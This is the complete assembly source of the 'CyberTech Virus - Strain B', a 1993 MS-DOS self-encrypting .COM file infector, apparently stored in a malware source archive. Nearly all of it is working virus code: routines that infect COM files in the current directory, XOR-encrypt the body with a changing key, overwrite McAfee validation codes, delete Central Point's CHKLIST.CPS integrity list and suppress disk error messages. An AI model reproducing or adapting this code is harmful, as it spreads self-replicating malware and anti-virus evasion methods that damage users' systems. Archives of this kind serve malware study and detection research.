MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.cybtchb2.asm
2021-01-12 17:38:47 -06:00

501 lines
22 KiB
NASM
Raw Blame History

;
; CyberTech Virus - Strain B John Tardy (C) 1993
;
; Written in A86 V3.22
;
; Description : This is a Non-Resident Self-Encrypting .COM file infector
; which infects COM files in the current directory. It will
; remove CHKLIST.CPS from the current directory after it has
; infected a program. CHKLIST.CPS is a file which is used by
; VDEFEND of PCSHELL and Central Point AntiVirus. When a
; validation code is added by SCAN of McAfee, it will overwrite
; the code, so the file is no longer CRC protected anymore.
; After 1993, the virus activates. It then displays a message
; that your system has been infected. The virus will remove
; itself from the infected file and completely restore it. If
; a validation code was added, it is lost, but the file is not
; corrupted and will function normally. Even when the file is
; compressed afterwards by an executable file compressor, it is
; uncompressed. Before 1994, the virus sometimes display it's
; copyright. This is caused when the random encryption counter
; is a 0. It will redefine it, so there is no visible text in
; the virus. It checks also if there is enough diskspace
; aveable and installs a critical error handler.
;
Org 0h ; Generate .BIN file
Start: Jmp MainVir ; Jump to decryptor code at EOF
Db '*' ; Virus signature (very short)
;
; Decryptor procedure
;
MainVir: Call On1 ; Push offset on stack
On1: Pop BP ; Calculate virus offset
Sub BP,Offset MainVir+3 ;
Push Ax ; Save possible error code
Lea Di,Crypt[BP] ; Decrypt the virus with a
Mov Si,Di ; very simple exclusive or
Mov Cx,CryptLen ; function.
Decrypt: Lodsb ;
Xor Al,0 ;
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Length of the decryptor
;
; Main initialization procedure
;
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at
Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com)
Mov Cs:Start+100h,Ax ;
Mov Cs:Start[2]+100h,Bx ;
Xor Ax,Ax ; Get original interrupt 24
Push Ax ; (critical error handler)
Pop Ds ;
Mov Bx,Ds:[4*24h] ;
Mov Es,Ds:[4*24h]+4 ;
Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place
Mov Word Ptr Cs:OldInt24+2[Bp],Es ;
Lea Bx,NewInt24[Bp] ; Install own critical error
Push Cs ; handler to avoid messages
Pop Es ; when a disk is write
Mov Word Ptr Ds:[4*24h],Bx ; protected and such things
Mov Word Ptr Ds:[4*24h]+2,Es ;
Push Cs ;
Pop Ds ;
Mov Ah,30h ; Check if DOS version is
Int 21h ; 3.0 or above for correct
Cmp Al,3 ; interrupt use
Jae TestDate ;
Jmp Ready ;
TestDate: Mov Ah,2ah ; Check if 1993 is past time
Int 21h ; already
Cmp Cx,1994 ;
Jae Clean ; - 1994 or more
Jmp NoClean ; - Not 1994 or more
;
; Main Cleanup procedure
;
Clean: Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fd00h ;
Int 21h ;
Mov Ax,Cs:[2ch] ; Find the name of the
Mov Ds,Ax ; program that is now
Mov Si,0 ; executed (me must search in
Mov Cx,4000h ; the DOS environment for
Seeker: Lodsb ; safe tracking of the name
Cmp Al,1 ;
Je On3 ;
Loop Seeker ;
On3: Inc Si ; Transfer the found name
Push Cs ; to a safe address in memory
Pop Es ;
Mov Di,0fd80h ;
Mov Cx,80h ;
Trans: Lodsb ;
Cmp Al,0 ;
Je Verder ;
Stosb ;
Loop Trans ;
Verder: Stosb
Sub Di,12
Push Cs
Pop Ds
Mov Ax,[Di][0] ;
Cmp Ax,'OC'
Jne Normal
Mov Ax,[Di][2]
Cmp Ax,'MM'
Jne Normal
Mov Ax,[Di][4]
Cmp Ax,'NA'
Jne Normal
Jmp Ready
Normal: Push Cs ; Read file attributes and
Pop Ds ; check if an error has
Mov Ax,4300h ; occured
Mov Dx,0fd80h ;
Int 21h ;
Jnc DeInfect ; - No error, DeInfect
Jmp Ready ; - Error, Ready
DeInfect: Push Cx ; Store old file attributes
Mov Ax,4301h ; Clear file attributes
Xor Cx,Cx ; (for read only etc.)
Int 21h ;
Mov Ax,3d02h ; Open the file
Int 21h ;
Mov Bx,Ax ; Read file date/time stamp
Mov Ax,5700h ; and store it on the stack
Int 21h ; for later use
Push Cx ;
Push Dx ;
Mov Ah,3eh ; Close file
Int 21h ;
Mov Dx,0fd80h ; Create a new file with the
Xor Cx,Cx ; same name
Mov Ah,3ch ;
Int 21h ;
Mov Bx,Ax ; store file handle in BX
Mov Dx,100h ; program to file (the original
Mov Cx,Bp ; file is now back again)
Sub Cx,0fch ;
Mov Ah,40h ; write memory image of host
Int 21h ;
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Pop Cx ; restore file attributes
Mov Ax,4301h ;
Mov Dx,0fd80h ;
Int 21h ;
Push Cs ; Show message that the
Pop Ds ; system has been infected
Mov Ah,9 ; and shutdown virus
Lea Dx,Removed[Bp] ;
Int 21h ;
Jmp Ready ;
;
; Main viral part
;
NoClean: Mov Ah,1ah ; Store DTA at safe place
Mov Dx,0fd00h ;
Int 21h ;
Mov Ah,4eh ; FindFirsFile Function
Search: Lea Dx,FileSpec[BP] ; Search for filespec given
Xor Cx,Cx ; in FileSpec adress
Int 21h ;
Jnc Found ; Found - Found
Jmp Ready ; Not Found - Ready
Found: Mov Ax,4300h ; Get file attributes and
Mov Dx,0fd1eh ; store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; clear file attributes
Xor Cx,Cx ;
Int 21h ;
Mov Ax,3d02h ; open file with read/write
Int 21h ; access
Mov Bx,5700h ; save file date/time stamp
Xchg Ax,Bx ; on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; read the first 4 bytes of
Lea Dx,OrgPrg[BP] ; the program onto OrgPrg
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file
Cmp Ax,'ZM' ;
Je ExeFile ;
Cmp Ax,'MZ' ; Check if renamed weird exe-
Je ExeFile ; file
Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected
Cmp Ah,'*' ;
Jne Infect ;
ExeFile: Call Close ; If one of the checks is yes,
Mov Ah,4fh ; close file and search next
Jmp Search ; file
FSeek: Xor Cx,Cx ; subroutine to jump to end
Xor Dx,Dx ; or begin of file
Int 21h ;
Ret ;
Infect: Mov Ax,0fd1e[0] ; check if the file is
Cmp Ax,'OC' ; COMMAN?.COM (usually result
Jne NoCommand ; if COMMAND.COM)
Mov Ax,0fd1e[2] ;
Cmp Ax,'MM' ;
Jne NoCommand ;
Mov Ax,0fd1e[4] ;
Cmp Ax,'NA' ;
Jne NoCommand ;
Mov Ax,4202h ; Jump to EOF
Call Fseek ;
Cmp Ax,0f000h ; Check if file too large
Jae ExeFile
Cmp Ax,VirS ; Check if file to short
jbe ExeFile
Sub Ax,VirS
Xchg Cx,Dx
Mov Dx,4200h
Xchg Dx,Ax
Mov EOFminVir[BP],Dx
Int 21h
Mov Ah,3fh
Mov Dx,Offset Buffer
Mov Cx,VirS
Int 21h
Cld
Mov Si,Offset Buffer
Mov Cx,VirLen
On5:
Push Cx
On6: Lodsb
Cmp Al,0
Jne On4
Loop On6
On4: Cmp Cx,0
Je Found0
Pop Cx
Cmp Si,SeekLen
Jb On5
Jmp NoCommand
Found0: Pop Cx
Sub Si,Offset Buffer
Sub Si,Cx
Xor Cx,Cx
Mov Dx,EOFminVir[BP]
Add Dx,Si
Mov Ax,4200h
Int 21h
Jmp CalcVirus
EOFminVir Dw 0
NoCommand: Mov Ax,4202h ; jump to EOF
Call FSeek ;
Cmp Ax,0f000h ; Check if file too large
Jb NoExe1 ; if yes, goto exefile
Jmp ExeFile ;
NoExe1: Cmp Ax,10 ; Check if file too short
Ja NoExe2 ; if yes, goto exefile
Jmp ExeFile ;
NoExe2: Mov Cx,Dx ; calculate pointer to offset
Mov Dx,Ax ; EOF-52 (for McAfee validation
Sub Dx,52 ; codes)
Mov Si,Cx ; move file pointer to the
Mov Di,Dx ; calculated address
Mov Ax,4200h ;
Int 21h ;
Mov Ah,3fh ; read the last 52 bytes
Mov Dx,0fb00h ; of the file
Mov Cx,52 ;
Int 21h ;
Cmp Ds:0Fb00h,0fdf0h ; check if protected with the
Jne Check2 ; AG option
Cmp Ds:0fb02h,0aac5h ;
Jne Check2 ;
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Int 21h ; code
Jmp CalcVirus ;
Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the
Jne Eof ; AV option
Cmp Ds:0Fb02h+42,0aac5h ;
Jne Eof ;
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Add Dx,42 ; code
Int 21h ;
Jmp CalcVirus ;
Eof: Mov Ax,4202h ; not AG or AV - jump to
Call Fseek ; EOF
CalcVirus: Sub Ax,3 ; calculate the jump for the
Mov Cs:CallPtr[BP]+1,Ax ; virus start
GetCrypt: Mov Ah,2ch ; get 100s seconds for the
Int 21h ; encryption value.
Cmp Dl,0 ; if not zero, goto NoZero
Jne NoZero ;
Mov Ah,9 ; If zero, display copyright
Lea Dx,Msg[Bp] ; message and generate again
Int 21h ; a number
Jmp GetCrypt ;
NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor
Lea Si,MainVir[BP] ; Move changed decryptor to
Mov Di,0fb00h ; a safe place in memory
Mov Cx,DecrLen ;
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus and merge
Mov Cx,CryptLen ; it to the changed decryptor
Encrypt: Lodsb ; code
Xor Al,Dl ;
Stosb ;
Loop Encrypt ;
Mov Ah,40h ; append virus at EOF or over
Lea Dx,0fb00h ; the validation code of
Mov Cx,VirLen ; McAfee
Int 21h ;
Mov Ax,4200h ; Jump to BOF
Call FSeek ;
Mov Ah,40h ; Write Jump at BOF
Lea Dx,CallPtr[BP] ;
Mov Cx,4 ;
Int 21h ;
Call Close ; Jump to Close routine
Ready: Mov Ah,1ah ; Restore DTA to normal
Mov Dx,80h ; offset
Int 21h ;
Mov Ax,Cs:OldInt24[Bp] ; remove critical error
Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the
Xor Bx,Bx ; original handler at the
Push Bx ; interrupt table
Pop Ds ;
Mov Ds:[4*24h],Dx ;
Mov Ds:[4*24h]+2,Ax ;
Push Cs ;
Pop Ds ;
Pop Ax ; restore possible error code
Mov Bx,100h ; nice way to jump to the
Push Cs ; begin of the original host
Push Bx ; code
Retf ;
Close: Pop Si ; why???
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Mov Ax,4301h ; restore file attributes
Pop Cx ;
Mov Dx,0fd1eh ;
Int 21h ;
Mov Ah,41h ; delete CHKLIST.CPS (the
Lea Dx,CpsName[BP] ; Central Point CRC list)
Int 21h ;
Push Si ; why???
Ret
;
; Message when we are in 1994
;
;Removed Db 13,10,'Virus removed : ',13,10
Removed Db 13,10,'Previous year you was infected by me, but now I am'
Db 13,10,'gone. Message to McAfee : do not group viruses, it is'
Db 13,10,'confusing, better use CARO standards for every virus.'
Db 13,10,'Also improve your scanner, so that I cannot simply switch'
Db 13,10,'2 lines of code in my decryptor and it is hidden again.'
Db 13,10,'Can virus scan strains be copyrighted, so that every'
Db 13,10,'scanner needs a seperate strain?',13,10
;
; Message when encryption byte = 0 or when we are living in 1994
;
Msg Db 13,10,'CyberTech Virus - Strain B-2'
Db 13,10,'(C) 1993 John Tardy of Trident'
Db 13,10,'$'
;
; New critical error handler
;
NewInt24: Mov Al,3 ; supress any critical error
Iret ; messages
CpsName Db 'chklist.cps',0 ; name for CP CRC-list
OldInt24 Dd 0 ; storage place for old int 24
CallPtr Db 0e9h,0,0 ; jump to place at BOF
FileSpec Db '*.COM',0 ; filespec and infection marker
OrgPrg: Int 20h ; original program
Db 'JT' ;
CryptLen Equ $-Crypt ; encrypted part length
VirLen Equ $-MainVir ; total virus length
Buffer Equ 0f040h ; buffer offset
VirS Equ VirLen*2
SeekLen Equ Buffer+Virs
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>